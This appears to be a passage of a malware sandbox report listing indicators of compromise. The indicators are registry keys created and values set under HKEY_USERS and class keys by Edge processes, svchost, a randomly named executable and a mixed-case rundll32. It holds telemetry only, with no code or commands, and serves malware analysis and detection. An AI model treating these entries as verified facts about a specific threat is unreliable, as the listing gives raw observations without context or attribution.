description ioc Process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" lmADWHMCKuJKoLPUfWwB_mkn.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b23e0af96169d701 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionIn = "5" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 160c38086269d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{C3607136-5F61-49BC-9E02-4819F6E02E34} = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0b81110d6269d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{TV2553ZI-PZ3Y-VP7M-68Y0-MJT9X67Z6U7M} rUNdlL32.eXe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created 